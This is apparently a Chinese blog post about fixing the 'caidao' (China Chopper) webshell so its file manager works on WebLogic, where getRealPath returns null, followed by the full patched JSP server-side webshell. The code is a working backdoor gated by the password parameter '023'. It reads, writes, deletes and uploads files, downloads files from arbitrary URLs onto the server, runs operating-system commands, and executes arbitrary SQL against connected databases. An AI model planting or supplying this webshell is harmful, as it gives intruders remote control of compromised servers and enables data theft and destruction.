有时候在一些特定的weblogic环境下,菜刀会有一个奇怪的问题,就是文件管理用不了,但是可以执行命令。
http://7xilp8.com1.z0.glb.clouddn.com/2016%2F01%2F03%2FWebLogic-caidao-fixed%2FFileList_err.jpg
http://7xilp8.com1.z0.glb.clouddn.com/2016%2F01%2F03%2FWebLogic-caidao-fixed%2Fcmd_works.jpg

通过debug,发现服务端代码里String s=request.getSession().getServletContext().getRealPath("/");这一句返回了null。进一步查资料,发现了这篇文章:
在weblogic 11g上 this.getServletContext().getRealPath(“/“)为null的原因及解决方法

确定为getRealPath()方法的锅,用文中提到的方法替换上述问题部分,问题解决。

修改后的java菜刀服务端代码(12KB):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
<%@page import = "java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*" %>
<%!
String Pwd = "023";
String EC(String s, String c)throws Exception
{
return s;
}

String getAbsolutePathByContext(HttpServletRequest request) throws Exception
{
String webPath = request.getSession().getServletContext().getRealPath("/");
webPath = webPath.replaceAll("[\\\\\\/]WEB-INF[\\\\\\/]classes[\\\\\\/]?", "/");
webPath = webPath.replaceAll("[\\\\\\/]+", "/");
webPath = webPath.replaceAll("%20", " ");

if (webPath.matches("^[a-zA-Z]:.*?$")) {

} else {
webPath = "/" + webPath;
}

webPath += "/";
webPath = webPath.replaceAll("[\\\\\\/]+", "/");
return webPath;
}

String getAbsolutePathByClass(HttpServletRequest request) throws Exception
{
String webPath = request.getClass().getResource("/").getPath().replaceAll("^\\/", "");
webPath = webPath.replaceAll("[\\\\\\/]WEB-INF[\\\\\\/]classes[\\\\\\/]?", "/");
webPath = webPath.replaceAll("[\\\\\\/]+", "/");
webPath = webPath.replaceAll("%20", " ");

if (webPath.matches("^[a-zA-Z]:.*?$")) {

} else {
webPath = "/" + webPath;
}

webPath += "/";
webPath = webPath.replaceAll("[\\\\\\/]+", "/");

return webPath;
}

String getAbsolutePathByResource(HttpServletRequest request) throws Exception
{
URL url = request.getServletContext().getResource("/");
String path = new File(url.toURI()).getAbsolutePath();
if (!path.endsWith("\\") && !path.endsWith("/")) {
path += File.separator;
}
return path;
}

String getRealPathB(HttpServletRequest request) throws Exception
{
String webPath = null;
webPath = request.getSession().getServletContext().getRealPath("/");

if (webPath == null)
{
try
{
webPath = getAbsolutePathByContext(request);
} catch (Exception e){
}
}

if (webPath == null)
{
try
{
webPath = getAbsolutePathByClass(request);
} catch (Exception e) {
}
}

if (webPath == null)
{
try
{
webPath = getAbsolutePathByResource(request);
} catch (Exception e) {
}
}

if (webPath == null)
throw new Exception("getRealPath err!");
return webPath;
}

Connection GC(String s)throws Exception
{
String[] x = s.trim().split("\r\n");
Class.forName(x[0].trim()).newInstance();
Connection c = DriverManager.getConnection(x[1].trim());
if(x.length > 2)
{
c.setCatalog(x[2].trim());
}
return c;
}
void AA(StringBuffer sb)throws Exception
{
File r[] = File.listRoots();
for(int i = 0; i < r.length; i++)
{
sb.append(r[i].toString().substring(0, 2));
}
}
void BB(String s, StringBuffer sb)throws Exception
{
File oF = new File(s), l[] = oF.listFiles();
String sT, sQ, sF = "";
java.util.Date dt;
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for(int i = 0; i < l.length; i++)
{
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
if(l[i].isDirectory())
{
sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n");
}
else
{
sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
}
}
sb.append(sF);
}
void EE(String s)throws Exception
{
File f = new File(s);
if(f.isDirectory())
{
File x[] = f.listFiles();
for(int k = 0; k < x.length; k++)
{
if(!x[k].delete())
{
EE(x[k].getPath());
}
}
}
f.delete();
}
void FF(String s, HttpServletResponse r)throws Exception
{
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
os.write(("->" + "|").getBytes(), 0, 3);
while((n = is.read(b, 0, 512)) != -1)
{
os.write(b, 0, n);
}
os.write(("|" + "<-").getBytes(), 0, 3);
os.close();
is.close();
}
void GG(String s, String d)throws Exception
{
String h = "0123456789ABCDEF";
int n;
File f = new File(s);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f);
for(int i = 0; i < d.length(); i += 2)
{
os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
}
os.close();
}
void HH(String s, String d)throws Exception
{
File sf = new File(s), df = new File(d);
if(sf.isDirectory())
{
if(!df.exists())
{
df.mkdir();
}
File z[] = sf.listFiles();
for(int j = 0; j < z.length; j++)
{
HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
}
}
else
{
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[512];
while((n = is.read(b, 0, 512)) != -1)
{
os.write(b, 0, n);
}
is.close();
os.close();
}
}
void II(String s, String d)throws Exception
{
File sf = new File(s), df = new File(d);
sf.renameTo(df);
}
void JJ(String s)throws Exception
{
File f = new File(s);
f.mkdir();
}
void KK(String s, String t)throws Exception
{
File f = new File(s);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(t);
f.setLastModified(dt.getTime());
}
void LL(String s, String d)throws Exception
{
URL u = new URL(s);
int n = 0;
FileOutputStream os = new FileOutputStream(d);
HttpURLConnection h = (HttpURLConnection)u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while((n = is.read(b)) != -1)
{
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
}
void MM(InputStream is, StringBuffer sb)throws Exception
{
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while((l = br.readLine()) != null)
{
sb.append(l + "\r\n");
}
}
void NN(String s, StringBuffer sb)throws Exception
{
Connection c = GC(s);
ResultSet r = s.indexOf("oracle") != -1 ? c.getMetaData().getSchemas() : c.getMetaData().getCatalogs();
while(r.next())
{
sb.append(r.getString(1) + "\t");
}
r.close();
c.close();
}
void OO(String s, StringBuffer sb)throws Exception
{
Connection c = GC(s);
String[] t = {"TABLE"};
ResultSet r = c.getMetaData().getTables (null, null, "%", t);
while(r.next())
{
sb.append(r.getString("TABLE_NAME") + "\t");
}
r.close();
c.close();
}
void PP(String s, StringBuffer sb)throws Exception
{
String[] x = s.trim().split("\r\n");
Connection c = GC(s);
Statement m = c.createStatement(1005, 1007);
ResultSet r = m.executeQuery("select * from " + x[3]);
ResultSetMetaData d = r.getMetaData();
for(int i = 1; i <= d.getColumnCount(); i++)
{
sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t");
}
r.close();
m.close();
c.close();
}
void QQ(String cs, String s, String q, StringBuffer sb, String p) throws Exception
{
Connection c = GC(s);
Statement m = c.createStatement(1005, 1008);
BufferedWriter bws = null;
try
{
ResultSet r = m.executeQuery(q.indexOf("--f:") != -1 ? q.substring(0, q.indexOf("--f:")) : q);
ResultSetMetaData d = r.getMetaData();
int n = d.getColumnCount();
for (int i = 1; i <= n; i++)
{
sb.append(d.getColumnName(i) + "\t|\t");
}
sb.append("\r\n");
if(q.indexOf("--f:") != -1)
{
File file = new File(p);
file.mkdirs();
bws = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(p + q.substring(q.indexOf("--f:") + 4, q.length()).trim()), true), cs));
}
while (r.next())
{
for(int i = 1; i <= n; i++)
{
if(q.indexOf("--f:") != -1)
{
bws.write(EC(r.getString(i), cs) + "\t");
bws.flush();
}
else
{
sb.append(EC(r.getString(i), cs) + "\t|\t");
}
}
bws.newLine();
sb.append("\r\n");
}
r.close();
if(bws != null)
{
bws.close();
}
}
catch (Exception e)
{
sb.append("Result\t|\t\r\n");
try
{
m.executeUpdate(q);
sb.append("Execute Successfully!\t|\t\r\n");
}
catch (Exception ee)
{
sb.append(ee.toString() + "\t|\t\r\n");
}
}
m.close();
c.close();
}
%><%
String cs = request.getParameter("z0") + "";
request.setCharacterEncoding(cs);
response.setContentType("text/html;charset=" + cs);
String Z = EC(request.getParameter(Pwd) + "", cs);
String z1 = EC(request.getParameter("z1") + "", cs);
String z2 = EC(request.getParameter("z2") + "", cs);
StringBuffer sb = new StringBuffer("");
try
{
sb.append("->" + "|");
//String s = request.getSession().getServletContext().getRealPath("/");
String s = getRealPathB(request);
if(Z.equals("A"))
{
sb.append(s + "\t");
if(!s.substring(0, 1).equals("/"))
//if(!File.separator.equals("/"))
{
AA(sb);
}
}
else if(Z.equals("B"))
{
BB(z1, sb);
}
else if(Z.equals("C"))
{
String l = "";
BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l = br.readLine()) != null)
{
sb.append(l + "\r\n");
}
br.close();
}
else if(Z.equals("D"))
{
BufferedWriter bws = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bws.write(z2);
bws.close();
sb.append("1");
}
else if(Z.equals("E"))
{
EE(z1);
sb.append("1");
}
else if(Z.equals("F"))
{
FF(z1, response);
}
else if(Z.equals("G"))
{
GG(z1, z2);
sb.append("1");
}
else if(Z.equals("H"))
{
HH(z1, z2);
sb.append("1");
}
else if(Z.equals("I"))
{
II(z1, z2);
sb.append("1");
}
else if(Z.equals("J"))
{
JJ(z1);
sb.append("1");
}
else if(Z.equals("K"))
{
KK(z1, z2);
sb.append("1");
}
else if(Z.equals("L"))
{
LL(z1, z2);
sb.append("1");
}
else if(Z.equals("M"))
{
String[] c = {z1.substring(2), z1.substring(0, 2), z2};
Process p = Runtime.getRuntime().exec(c);
MM(p.getInputStream(), sb);
MM(p.getErrorStream(), sb);
}
else if(Z.equals("N"))
{
NN(z1, sb);
}
else if(Z.equals("O"))
{
OO(z1, sb);
}
else if(Z.equals("P"))
{
PP(z1, sb);
}
else if(Z.equals("Q"))
{
QQ(cs, z1, z2, sb, s.replaceAll("\\\\", "/") + "/images/");
}
}
catch(Exception e)
{
sb.append("ERROR" + ":// " + e.toString());
}
sb.append("|" + "<-");
out.print(sb.toString());
%>

压缩版 jsp jspx